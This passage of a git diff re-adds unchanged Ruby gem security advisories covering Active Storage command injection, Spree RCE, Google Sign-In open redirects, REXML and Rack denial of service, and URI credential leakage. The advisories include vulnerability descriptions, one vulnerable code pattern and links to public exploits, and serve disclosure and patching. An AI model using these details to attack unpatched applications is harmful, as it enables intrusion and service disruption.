+    this vulnerability.
+  patched_versions:
+  - "~> 7.1.5, >= 7.1.5.2"
+  - "~> 7.2.2, >= 7.2.2.2"
+  - ">= 8.0.2.1"
+  related:
+    url:
+    - https://github.com/rails/rails/security/advisories/GHSA-76r7-hhxj-r776
+    - https://github.com/rails/rails/commit/3beef20013736fd52c5dcfdf061f7999ba318290
+    - https://github.com/rails/rails/commit/568c0bc2f1e74c65d150a84b89a080949bf9eb9b
+    - https://github.com/rails/rails/commit/6a944ca4805e72050a0fbb1a461534eb760d3202
+    - https://cert.kenet.or.ke/cve-2025-55193-ruby-rails-ansi-sequence-injection-vulnerability
+    - https://github.com/advisories/GHSA-76r7-hhxj-r776
+---
diff --git a/advisories/_posts/2025-08-14-CVE-2025-24293.md b/advisories/_posts/2025-08-14-CVE-2025-24293.md
index c3eb0097..0eecd154 100644
--- a/advisories/_posts/2025-08-14-CVE-2025-24293.md
+++ b/advisories/_posts/2025-08-14-CVE-2025-24293.md
@@ -1,79 +1,79 @@
----
-layout: advisory
-title: 'CVE-2025-24293 (activestorage): Active Storage allowed transformation methods
-  that were potentially unsafe'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2025-24293
-  ghsa: r4mg-4433-c7g3
-  url: https://github.com/rails/rails/security/advisories/GHSA-r4mg-4433-c7g3
-  title: Active Storage allowed transformation methods that were potentially unsafe
-  date: 2025-08-14
-  description: |
-    Active Storage attempts to prevent the use of potentially unsafe
-    image transformation methods and parameters by default.
-    The default allowed list contains three methods allowing for the
-    circumvention of the safe defaults which enables potential command
-    injection vulnerabilities in cases where arbitrary user supplied
-    input is accepted as valid transformation methods or parameters.
-
-    This has been assigned the CVE identifier CVE-2025-24293.
-
-    Versions Affected:  >= 5.2.0
-    Not affected:       < 5.2.0
-    Fixed Versions:     7.1.5.2, 7.2.2.2, 8.0.2.1
-
-    ## Impact
-
-    This vulnerability impacts applications that use Active Storage
-    with the image_processing processing gem in addition to
-    mini_magick as the image processor.
-
-    Vulnerable code will look something similar to this:
-
-    ```
-    <= image_tag blob.variant(params[:t] => params[:v]) >
-    ```
-
-    Where the transformation method or its arguments are untrusted
-    arbitrary input.
-
-    All users running an affected release should either upgrade or
-    use one of the workarounds immediately.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Consuming user supplied input for image transformation methods
-    or their parameters is unsupported behavior and should be
-    considered dangerous.
-
-    Strict validation of user supplied methods and parameters should
-    be performed as well as having a strong
-    [ImageMagick security policy](https://imagemagick.org/script/security-policy.php) deployed.
-
-    ## Credits
-
-    Thank you [lio346](https://hackerone.com/lio346) for reporting this!
-  unaffected_versions:
-  - "< 5.20"
-  patched_versions:
-  - "~> 7.1.5, >= 7.1.5.2"
-  - "~> 7.2.2, >= 7.2.2.2"
-  - ">= 8.0.2.1"
-  related:
-    url:
-    - https://github.com/rails/rails/security/advisories/GHSA-r4mg-4433-c7g3
-    - https://github.com/rails/rails/commit/1b1adf6ee6ca0f3104fcfce79360b2ec1e06a354
-    - https://github.com/rails/rails/commit/2d612735ac0d9712fdfffaf80afa627e7295f6ce
-    - https://github.com/rails/rails/commit/fb8f3a18c3d97524c0efc29150d1e5f3162fbb13
-    - https://github.com/advisories/GHSA-r4mg-4433-c7g3
----
+---
+layout: advisory
+title: 'CVE-2025-24293 (activestorage): Active Storage allowed transformation methods
+  that were potentially unsafe'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2025-24293
+  ghsa: r4mg-4433-c7g3
+  url: https://github.com/rails/rails/security/advisories/GHSA-r4mg-4433-c7g3
+  title: Active Storage allowed transformation methods that were potentially unsafe
+  date: 2025-08-14
+  description: |
+    Active Storage attempts to prevent the use of potentially unsafe
+    image transformation methods and parameters by default.
+    The default allowed list contains three methods allowing for the
+    circumvention of the safe defaults which enables potential command
+    injection vulnerabilities in cases where arbitrary user supplied
+    input is accepted as valid transformation methods or parameters.
+
+    This has been assigned the CVE identifier CVE-2025-24293.
+
+    Versions Affected:  >= 5.2.0
+    Not affected:       < 5.2.0
+    Fixed Versions:     7.1.5.2, 7.2.2.2, 8.0.2.1
+
+    ## Impact
+
+    This vulnerability impacts applications that use Active Storage
+    with the image_processing processing gem in addition to
+    mini_magick as the image processor.
+
+    Vulnerable code will look something similar to this:
+
+    ```
+    <= image_tag blob.variant(params[:t] => params[:v]) >
+    ```
+
+    Where the transformation method or its arguments are untrusted
+    arbitrary input.
+
+    All users running an affected release should either upgrade or
+    use one of the workarounds immediately.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Consuming user supplied input for image transformation methods
+    or their parameters is unsupported behavior and should be
+    considered dangerous.
+
+    Strict validation of user supplied methods and parameters should
+    be performed as well as having a strong
+    [ImageMagick security policy](https://imagemagick.org/script/security-policy.php) deployed.
+
+    ## Credits
+
+    Thank you [lio346](https://hackerone.com/lio346) for reporting this!
+  unaffected_versions:
+  - "< 5.20"
+  patched_versions:
+  - "~> 7.1.5, >= 7.1.5.2"
+  - "~> 7.2.2, >= 7.2.2.2"
+  - ">= 8.0.2.1"
+  related:
+    url:
+    - https://github.com/rails/rails/security/advisories/GHSA-r4mg-4433-c7g3
+    - https://github.com/rails/rails/commit/1b1adf6ee6ca0f3104fcfce79360b2ec1e06a354
+    - https://github.com/rails/rails/commit/2d612735ac0d9712fdfffaf80afa627e7295f6ce
+    - https://github.com/rails/rails/commit/fb8f3a18c3d97524c0efc29150d1e5f3162fbb13
+    - https://github.com/advisories/GHSA-r4mg-4433-c7g3
+---
diff --git a/advisories/_posts/2025-08-20-CVE-2011-10026.md b/advisories/_posts/2025-08-20-CVE-2011-10026.md
index 3f769729..006aff90 100644
--- a/advisories/_posts/2025-08-20-CVE-2011-10026.md
+++ b/advisories/_posts/2025-08-20-CVE-2011-10026.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2011-10026 (spree): Spree Commerce is vulnerable to RCE through Search
-  API'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2011-10026
-  ghsa: x485-rhg3-cqr4
-  url: https://github.com/advisories/GHSA-x485-rhg3-cqr4
-  title: Spree Commerce is vulnerable to RCE through Search API
-  date: 2025-08-20
-  description: |
-    Spreecommerce versions prior to 0.50.x contain a remote command
-    execution vulnerability in the API's search functionality. Improper
-    input sanitation allows attackers to inject arbitrary shell commands
-    via the search[instance_eval] parameter, which is dynamically invoked
-    using Ruby’s send method. This flaw enables unauthenticated attackers
-    to execute commands on the server.
-  cvss_v3: 9.8
-  cvss_v4: 9.3
-  unaffected_versions:
-  - "< 0.30.0.beta1"
-  patched_versions:
-  - ">= 0.50.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-10026
-    - https://github.com/spree
-    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
-    - https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
-    - https://www.exploit-db.com/exploits/17199
-    - https://www.vulncheck.com/advisories/spreecommerce-api-rce
-    - https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
-    - https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
-    - https://github.com/advisories/GHSA-x485-rhg3-cqr4
----
+---
+layout: advisory
+title: 'CVE-2011-10026 (spree): Spree Commerce is vulnerable to RCE through Search
+  API'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2011-10026
+  ghsa: x485-rhg3-cqr4
+  url: https://github.com/advisories/GHSA-x485-rhg3-cqr4
+  title: Spree Commerce is vulnerable to RCE through Search API
+  date: 2025-08-20
+  description: |
+    Spreecommerce versions prior to 0.50.x contain a remote command
+    execution vulnerability in the API's search functionality. Improper
+    input sanitation allows attackers to inject arbitrary shell commands
+    via the search[instance_eval] parameter, which is dynamically invoked
+    using Ruby’s send method. This flaw enables unauthenticated attackers
+    to execute commands on the server.
+  cvss_v3: 9.8
+  cvss_v4: 9.3
+  unaffected_versions:
+  - "< 0.30.0.beta1"
+  patched_versions:
+  - ">= 0.50.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-10026
+    - https://github.com/spree
+    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
+    - https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
+    - https://www.exploit-db.com/exploits/17199
+    - https://www.vulncheck.com/advisories/spreecommerce-api-rce
+    - https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
+    - https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
+    - https://github.com/advisories/GHSA-x485-rhg3-cqr4
+---
diff --git a/advisories/_posts/2025-08-27-CVE-2025-57821.md b/advisories/_posts/2025-08-27-CVE-2025-57821.md
index 01df4653..ed1589ae 100644
--- a/advisories/_posts/2025-08-27-CVE-2025-57821.md
+++ b/advisories/_posts/2025-08-27-CVE-2025-57821.md
@@ -1,63 +1,63 @@
----
-layout: advisory
-title: 'CVE-2025-57821 (google_sign_in): Google Sign-In for Rails allowed redirects
-  to malformed URLs'
-comments: false
-categories:
-- google_sign_in
-advisory:
-  gem: google_sign_in
-  cve: 2025-57821
-  ghsa: 7pwc-wh6m-44q3
-  url: https://github.com/basecamp/google_sign_in/security/advisories/GHSA-7pwc-wh6m-44q3
-  title: Google Sign-In for Rails allowed redirects to malformed URLs
-  date: 2025-08-27
-  description: |
-    ### Summary
-
-    It is possible to craft a malformed URL that passes the "same origin"
-    check, resulting in the user being redirected to another origin.
-
-    ### Details
-
-    The google_sign_in gem persists an optional URL for redirection after
-    authentication. If this URL is malformed, it's possible for the user
-    to be redirected to another origin after authentication, possibly
-    resulting in exposure of authentication information such as the token.
-
-    Normally the value of this URL is only written and read by the library.
-    If applications are configured to store session information in a
-    database, there is no known vector to exploit this vulnerability.
-    However, applications may be configured to store this information
-    in a session cookie, in which case it may be chained with a session
-    cookie attack to inject a crafted URL.
-
-    ### Impact
-
-    Rails applications configured to store the `flash` information in
-    a session cookie may be vulnerable, if this can be chained with an
-    attack that allows injection of arbitrary data into the session cookie.
-
-    ### Workarounds
-
-    If you are unable to upgrade this library, then you may mitigate
-    the chained attack by explicitly setting `SameSite=Lax` or
-    `SameSite=Strict` on the application session cookie.
-
-    ### Credits
-
-    This issue was responsibly reported by Hackerone user
-    [muntrive](https://hackerone.com/muntrive?type=user).
-  cvss_v3: 4.2
-  patched_versions:
-  - ">= 1.3.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-57821
-    - https://github.com/basecamp/google_sign_in/security/advisories/GHSA-7pwc-wh6m-44q3
-    - https://github.com/basecamp/google_sign_in/releases/tag/v1.3.0
-    - https://github.com/basecamp/google_sign_in/commit/a0548a604fb17e4eb1a57029f0d87e34e8499623
-    - https://github.com/basecamp/google_sign_in/pull/73
-    - https://github.com/basecamp/google_sign_in/commit/85903651201257d4f14b97d4582e6d968ac32f15
-    - https://github.com/advisories/GHSA-7pwc-wh6m-44q3
----
+---
+layout: advisory
+title: 'CVE-2025-57821 (google_sign_in): Google Sign-In for Rails allowed redirects
+  to malformed URLs'
+comments: false
+categories:
+- google_sign_in
+advisory:
+  gem: google_sign_in
+  cve: 2025-57821
+  ghsa: 7pwc-wh6m-44q3
+  url: https://github.com/basecamp/google_sign_in/security/advisories/GHSA-7pwc-wh6m-44q3
+  title: Google Sign-In for Rails allowed redirects to malformed URLs
+  date: 2025-08-27
+  description: |
+    ### Summary
+
+    It is possible to craft a malformed URL that passes the "same origin"
+    check, resulting in the user being redirected to another origin.
+
+    ### Details
+
+    The google_sign_in gem persists an optional URL for redirection after
+    authentication. If this URL is malformed, it's possible for the user
+    to be redirected to another origin after authentication, possibly
+    resulting in exposure of authentication information such as the token.
+
+    Normally the value of this URL is only written and read by the library.
+    If applications are configured to store session information in a
+    database, there is no known vector to exploit this vulnerability.
+    However, applications may be configured to store this information
+    in a session cookie, in which case it may be chained with a session
+    cookie attack to inject a crafted URL.
+
+    ### Impact
+
+    Rails applications configured to store the `flash` information in
+    a session cookie may be vulnerable, if this can be chained with an
+    attack that allows injection of arbitrary data into the session cookie.
+
+    ### Workarounds
+
+    If you are unable to upgrade this library, then you may mitigate
+    the chained attack by explicitly setting `SameSite=Lax` or
+    `SameSite=Strict` on the application session cookie.
+
+    ### Credits
+
+    This issue was responsibly reported by Hackerone user
+    [muntrive](https://hackerone.com/muntrive?type=user).
+  cvss_v3: 4.2
+  patched_versions:
+  - ">= 1.3.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-57821
+    - https://github.com/basecamp/google_sign_in/security/advisories/GHSA-7pwc-wh6m-44q3
+    - https://github.com/basecamp/google_sign_in/releases/tag/v1.3.0
+    - https://github.com/basecamp/google_sign_in/commit/a0548a604fb17e4eb1a57029f0d87e34e8499623
+    - https://github.com/basecamp/google_sign_in/pull/73
+    - https://github.com/basecamp/google_sign_in/commit/85903651201257d4f14b97d4582e6d968ac32f15
+    - https://github.com/advisories/GHSA-7pwc-wh6m-44q3
+---
diff --git a/advisories/_posts/2025-08-29-CVE-2025-58067.md b/advisories/_posts/2025-08-29-CVE-2025-58067.md
index 56f2786a..f328468c 100644
--- a/advisories/_posts/2025-08-29-CVE-2025-58067.md
+++ b/advisories/_posts/2025-08-29-CVE-2025-58067.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2025-58067 (google_sign_in): Google Sign-In for Rails allowed redirect
-  to protocol-relative URI'
-comments: false
-categories:
-- google_sign_in
-advisory:
-  gem: google_sign_in
-  cve: 2025-58067
-  ghsa: 5jch-xhw4-r43v
-  url: https://github.com/basecamp/google_sign_in/security/advisories/GHSA-5jch-xhw4-r43v
-  title: Google Sign-In for Rails allowed redirect to protocol-relative URI
-  date: 2025-08-29
-  description: |
-    ## Summary
-
-    It is possible to redirect a user to another origin if the
-    "proceed_to" value in the session store is set to a
-    protocol-relative URL.
-
-    ## Details
-
-    The google_sign_in gem persists an optional URL for redirection
-    after authentication. If this URL is set to a protocol-relative URL,
-    it improperly passes the "same origin" check, and it's possible
-    for the user to be redirected to another origin after authentication,
-    possibly resulting in exposure of authentication information if
-    this attack is chained with other attacks.
-
-    Normally the value of this URL is only written and read by the
-    library or the calling application. However, it may be possible to
-    set this session value from a malicious site with a form submission.
-
-    ## Impact
-
-    Any Rails applications using the google_sign_in gem may be vulnerable,
-    if this vector can be chained with another attack that is able to
-    modify the OAuth2 request parameters.
-
-    ## Workarounds
-
-    No known workarounds.
-
-    ## Credits
-
-    This issue was responsibly reported by Hackerone user
-    [muntrive](https://hackerone.com/muntrive?type=user).
-  cvss_v3: 4.2
-  patched_versions:
-  - ">= 1.3.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-58067
-    - https://github.com/basecamp/google_sign_in/security/advisories/GHSA-5jch-xhw4-r43v
-    - https://github.com/basecamp/google_sign_in/releases/tag/v1.3.1
-    - https://github.com/basecamp/google_sign_in/pull/75
-    - https://github.com/basecamp/google_sign_in/commit/e97aef4626b1bcbd2c6f01f7dd25f12ac855d4cc
-    - https://github.com/advisories/GHSA-5jch-xhw4-r43v
----
+---
+layout: advisory
+title: 'CVE-2025-58067 (google_sign_in): Google Sign-In for Rails allowed redirect
+  to protocol-relative URI'
+comments: false
+categories:
+- google_sign_in
+advisory:
+  gem: google_sign_in
+  cve: 2025-58067
+  ghsa: 5jch-xhw4-r43v
+  url: https://github.com/basecamp/google_sign_in/security/advisories/GHSA-5jch-xhw4-r43v
+  title: Google Sign-In for Rails allowed redirect to protocol-relative URI
+  date: 2025-08-29
+  description: |
+    ## Summary
+
+    It is possible to redirect a user to another origin if the
+    "proceed_to" value in the session store is set to a
+    protocol-relative URL.
+
+    ## Details
+
+    The google_sign_in gem persists an optional URL for redirection
+    after authentication. If this URL is set to a protocol-relative URL,
+    it improperly passes the "same origin" check, and it's possible
+    for the user to be redirected to another origin after authentication,
+    possibly resulting in exposure of authentication information if
+    this attack is chained with other attacks.
+
+    Normally the value of this URL is only written and read by the
+    library or the calling application. However, it may be possible to
+    set this session value from a malicious site with a form submission.
+
+    ## Impact
+
+    Any Rails applications using the google_sign_in gem may be vulnerable,
+    if this vector can be chained with another attack that is able to
+    modify the OAuth2 request parameters.
+
+    ## Workarounds
+
+    No known workarounds.
+
+    ## Credits
+
+    This issue was responsibly reported by Hackerone user
+    [muntrive](https://hackerone.com/muntrive?type=user).
+  cvss_v3: 4.2
+  patched_versions:
+  - ">= 1.3.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-58067
+    - https://github.com/basecamp/google_sign_in/security/advisories/GHSA-5jch-xhw4-r43v
+    - https://github.com/basecamp/google_sign_in/releases/tag/v1.3.1
+    - https://github.com/basecamp/google_sign_in/pull/75
+    - https://github.com/basecamp/google_sign_in/commit/e97aef4626b1bcbd2c6f01f7dd25f12ac855d4cc
+    - https://github.com/advisories/GHSA-5jch-xhw4-r43v
+---
diff --git a/advisories/_posts/2025-09-17-CVE-2025-58767.md b/advisories/_posts/2025-09-17-CVE-2025-58767.md
index cea74f77..8c469798 100644
--- a/advisories/_posts/2025-09-17-CVE-2025-58767.md
+++ b/advisories/_posts/2025-09-17-CVE-2025-58767.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2025-58767 (rexml): REXML has DoS condition when parsing malformed XML
-  file'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2025-58767
-  ghsa: c2f4-jgmc-q2r5
-  url: https://github.com/ruby/rexml/security/advisories/GHSA-c2f4-jgmc-q2r5
-  title: REXML has DoS condition when parsing malformed XML file
-  date: 2025-09-17
-  description: |
-    ### Impact
-
-    The REXML gems from 3.3.3 to 3.4.1 have a DoS vulnerability when
-    parsing XML containing multiple XML declarations. If you need to
-    parse untrusted XMLs, you may be impacted to these vulnerabilities.
-
-    ### Patches
-
-    REXML gems 3.4.2 or later include the patches to fix these vulnerabilities.
-
-    ### Workarounds
-
-    Don't parse untrusted XMLs.
-
-    ### References
-
-    * https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767
-      - An announcement on www.ruby-lang.org
-  cvss_v4: 1.2
-  unaffected_versions:
-  - "< 3.3.3"
-  patched_versions:
-  - ">= 3.4.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-58767
-    - https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767
-    - https://github.com/ruby/rexml/security/advisories/GHSA-c2f4-jgmc-q2r5
-    - https://github.com/ruby/rexml/commit/5859bdeac792687eaf93d8e8f0b7e3c1e2ed5c23
-    - https://github.com/advisories/GHSA-c2f4-jgmc-q2r5
----
+---
+layout: advisory
+title: 'CVE-2025-58767 (rexml): REXML has DoS condition when parsing malformed XML
+  file'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2025-58767
+  ghsa: c2f4-jgmc-q2r5
+  url: https://github.com/ruby/rexml/security/advisories/GHSA-c2f4-jgmc-q2r5
+  title: REXML has DoS condition when parsing malformed XML file
+  date: 2025-09-17
+  description: |
+    ### Impact
+
+    The REXML gems from 3.3.3 to 3.4.1 have a DoS vulnerability when
+    parsing XML containing multiple XML declarations. If you need to
+    parse untrusted XMLs, you may be impacted to these vulnerabilities.
+
+    ### Patches
+
+    REXML gems 3.4.2 or later include the patches to fix these vulnerabilities.
+
+    ### Workarounds
+
+    Don't parse untrusted XMLs.
+
+    ### References
+
+    * https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767
+      - An announcement on www.ruby-lang.org
+  cvss_v4: 1.2
+  unaffected_versions:
+  - "< 3.3.3"
+  patched_versions:
+  - ">= 3.4.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-58767
+    - https://www.ruby-lang.org/en/news/2025/09/18/dos-rexml-cve-2025-58767
+    - https://github.com/ruby/rexml/security/advisories/GHSA-c2f4-jgmc-q2r5
+    - https://github.com/ruby/rexml/commit/5859bdeac792687eaf93d8e8f0b7e3c1e2ed5c23
+    - https://github.com/advisories/GHSA-c2f4-jgmc-q2r5
+---
diff --git a/advisories/_posts/2025-09-25-CVE-2025-59830.md b/advisories/_posts/2025-09-25-CVE-2025-59830.md
index 69890c65..cf344723 100644
--- a/advisories/_posts/2025-09-25-CVE-2025-59830.md
+++ b/advisories/_posts/2025-09-25-CVE-2025-59830.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'CVE-2025-59830 (rack): Rack has an unsafe default in Rack::QueryParser allows
-  params_limit bypass via semicolon-separated parameters'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-59830
-  ghsa: 625h-95r8-8xpm
-  url: https://github.com/rack/rack/security/advisories/GHSA-625h-95r8-8xpm
-  title: Rack has an unsafe default in Rack::QueryParser allows params_limit bypass
-    via semicolon-separated parameters
-  date: 2025-09-25
-  description: |
-    ## Summary
-
-    `Rack::QueryParser` in version `< 2.2.18` enforces its `params_limit`
-    only for parameters separated by `&`, while still splitting on both
-    `&` and `;`. As a result, attackers could use `;` separators to
-    bypass the parameter count limit and submit more parameters than intended.
-
-    ## Details
-
-    The issue arises because `Rack::QueryParser#check_query_string`
-    counts only `&` characters when determining the number of parameters,
-    but the default separator regex `DEFAULT_SEP = /[&;] */n` splits on
-    both `&` and `;`. This mismatch means that queries using `;`
-    separators were not included in the parameter count, allowing
-    `params_limit` to be bypassed.
-
-    Other safeguards (`bytesize_limit` and `key_space_limit`) still
-    applied, but did not prevent this particular bypass.
-
-    ## Impact
-
-    Applications or middleware that directly invoke `Rack::QueryParser`
-    with its default configuration (no explicit delimiter) could be
-    exposed to increased CPU and memory consumption. This can be abused
-    as a limited denial-of-service vector.
-
-    `Rack::Request`, the primary entry point for typical Rack applications,
-    uses `QueryParser` in a safe way and does not appear vulnerable by
-    default. As such, the severity is considered **low**, with the impact
-    limited to edge cases where `QueryParser` is used directly.
-
-    ## Mitigation
-
-    * Upgrade to a patched version of Rack where both `&` and `;` are
-      counted consistently toward `params_limit`.
-    * If upgrading is not immediately possible, configure `QueryParser`
-      with an explicit delimiter (e.g., `&`) to avoid the mismatch.
-    * As a general precaution, enforce query string and request size
-      limits at the web server or proxy layer (e.g., Nginx, Apache, or
-      a CDN) to mitigate excessive parsing overhead.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.2.18"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-59830
-    - https://github.com/rack/rack/security/advisories/GHSA-625h-95r8-8xpm
-    - https://github.com/rack/rack/commit/54e4ffdd5affebcb0c015cc6ae74635c0831ed71
-    - https://github.com/advisories/GHSA-625h-95r8-8xpm
----
+---
+layout: advisory
+title: 'CVE-2025-59830 (rack): Rack has an unsafe default in Rack::QueryParser allows
+  params_limit bypass via semicolon-separated parameters'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-59830
+  ghsa: 625h-95r8-8xpm
+  url: https://github.com/rack/rack/security/advisories/GHSA-625h-95r8-8xpm
+  title: Rack has an unsafe default in Rack::QueryParser allows params_limit bypass
+    via semicolon-separated parameters
+  date: 2025-09-25
+  description: |
+    ## Summary
+
+    `Rack::QueryParser` in version `< 2.2.18` enforces its `params_limit`
+    only for parameters separated by `&`, while still splitting on both
+    `&` and `;`. As a result, attackers could use `;` separators to
+    bypass the parameter count limit and submit more parameters than intended.
+
+    ## Details
+
+    The issue arises because `Rack::QueryParser#check_query_string`
+    counts only `&` characters when determining the number of parameters,
+    but the default separator regex `DEFAULT_SEP = /[&;] */n` splits on
+    both `&` and `;`. This mismatch means that queries using `;`
+    separators were not included in the parameter count, allowing
+    `params_limit` to be bypassed.
+
+    Other safeguards (`bytesize_limit` and `key_space_limit`) still
+    applied, but did not prevent this particular bypass.
+
+    ## Impact
+
+    Applications or middleware that directly invoke `Rack::QueryParser`
+    with its default configuration (no explicit delimiter) could be
+    exposed to increased CPU and memory consumption. This can be abused
+    as a limited denial-of-service vector.
+
+    `Rack::Request`, the primary entry point for typical Rack applications,
+    uses `QueryParser` in a safe way and does not appear vulnerable by
+    default. As such, the severity is considered **low**, with the impact
+    limited to edge cases where `QueryParser` is used directly.
+
+    ## Mitigation
+
+    * Upgrade to a patched version of Rack where both `&` and `;` are
+      counted consistently toward `params_limit`.
+    * If upgrading is not immediately possible, configure `QueryParser`
+      with an explicit delimiter (e.g., `&`) to avoid the mismatch.
+    * As a general precaution, enforce query string and request size
+      limits at the web server or proxy layer (e.g., Nginx, Apache, or
+      a CDN) to mitigate excessive parsing overhead.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.2.18"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-59830
+    - https://github.com/rack/rack/security/advisories/GHSA-625h-95r8-8xpm
+    - https://github.com/rack/rack/commit/54e4ffdd5affebcb0c015cc6ae74635c0831ed71
+    - https://github.com/advisories/GHSA-625h-95r8-8xpm
+---
diff --git a/advisories/_posts/2025-10-07-CVE-2025-61594.md b/advisories/_posts/2025-10-07-CVE-2025-61594.md
index eb3927a9..3e391c82 100644
--- a/advisories/_posts/2025-10-07-CVE-2025-61594.md
+++ b/advisories/_posts/2025-10-07-CVE-2025-61594.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2025-61594 (uri): CVE-2025-61594 - URI Credential Leakage Bypass over
-  CVE-2025-27221'
-comments: false
-categories:
-- uri
-advisory:
-  gem: uri
-  cve: 2025-61594
-  ghsa: j4pr-3wm6-xx2r
-  url: https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594
-  title: CVE-2025-61594 - URI Credential Leakage Bypass over CVE-2025-27221
-  date: 2025-10-07
-  description: |2
-
-    In affected URI version, a bypass exists for the fix to CVE-2025-27221
-    that can expose user credentials.
-
-    This vulnerability has been assigned the CVE identifier CVE-2025-61594.
-    We recommend upgrading the uri gem.
-
-    ## Details
-
-    When using the + operator to combine URIs, sensitive information
-    like passwords from the original URI can be leaked, violating
-    RFC3986 and making applications vulnerable to credential exposure.
-
-    Please update URI gem to version 0.12.5, 0.13.3, 1.0.4 or later.
-
-    ## Affected versions
-
-    uri gem versions < 0.12.5, 0.13.0 to 0.13.2 and 1.0.0 to 1.0.3.
-
-    ## Credits
-
-    Thanks to junfuchong (chongfujun) for discovering this issue.
-    Also thanks to nobu for additional fixes of this vulnerability.
-  patched_versions:
-  - "~> 0.12.5"
-  - "~> 0.13.3"
-  - ">= 1.0.4"
-  related:
-    url:
-    - https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594
-    - https://rubygems.org/gems/uri/versions/1.0.4
-    - https://rubygems.org/gems/uri/versions/0.13.3
-    - https://rubygems.org/gems/uri/versions/0.12.5
-    - https://github.com/ruby/uri
----
+---
+layout: advisory
+title: 'CVE-2025-61594 (uri): CVE-2025-61594 - URI Credential Leakage Bypass over
+  CVE-2025-27221'
+comments: false
+categories:
+- uri
+advisory:
+  gem: uri
+  cve: 2025-61594
+  ghsa: j4pr-3wm6-xx2r
+  url: https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594
+  title: CVE-2025-61594 - URI Credential Leakage Bypass over CVE-2025-27221
+  date: 2025-10-07
+  description: |2
+
+    In affected URI version, a bypass exists for the fix to CVE-2025-27221
+    that can expose user credentials.
+
+    This vulnerability has been assigned the CVE identifier CVE-2025-61594.
+    We recommend upgrading the uri gem.
+
+    ## Details
+
+    When using the + operator to combine URIs, sensitive information
+    like passwords from the original URI can be leaked, violating
+    RFC3986 and making applications vulnerable to credential exposure.
+
+    Please update URI gem to version 0.12.5, 0.13.3, 1.0.4 or later.
+
+    ## Affected versions
+
+    uri gem versions < 0.12.5, 0.13.0 to 0.13.2 and 1.0.0 to 1.0.3.
+
+    ## Credits
+
+    Thanks to junfuchong (chongfujun) for discovering this issue.
+    Also thanks to nobu for additional fixes of this vulnerability.
+  patched_versions:
+  - "~> 0.12.5"
+  - "~> 0.13.3"
+  - ">= 1.0.4"
+  related:
+    url:
+    - https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594
+    - https://rubygems.org/gems/uri/versions/1.0.4
+    - https://rubygems.org/gems/uri/versions/0.13.3
+    - https://rubygems.org/gems/uri/versions/0.12.5
+    - https://github.com/ruby/uri
+---
diff --git a/advisories/_posts/2025-10-07-CVE-2025-61770.md b/advisories/_posts/2025-10-07-CVE-2025-61770.md
index c86ec125..6e7dce2d 100644
--- a/advisories/_posts/2025-10-07-CVE-2025-61770.md
+++ b/advisories/_posts/2025-10-07-CVE-2025-61770.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'CVE-2025-61770 (rack): Rack''s unbounded multipart preamble buffering enables
-  DoS (memory exhaustion)'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-61770
-  ghsa: p543-xpfm-54cp
-  url: https://github.com/rack/rack/security/advisories/GHSA-p543-xpfm-54cp
-  title: Rack's unbounded multipart preamble buffering enables DoS (memory exhaustion)
-  date: 2025-10-07
-  description: |
-    ## Summary
-
-    `Rack::Multipart::Parser` buffers the entire multipart **preamble**
-    (bytes before the first boundary) in memory without any size limit.
-    A client can send a large preamble followed by a valid boundary,
-    causing significant memory use and potential process termination
-    due to out-of-memory (OOM) conditions.
-
-    ## Details
-
-    While searching for the first boundary, the parser appends incoming
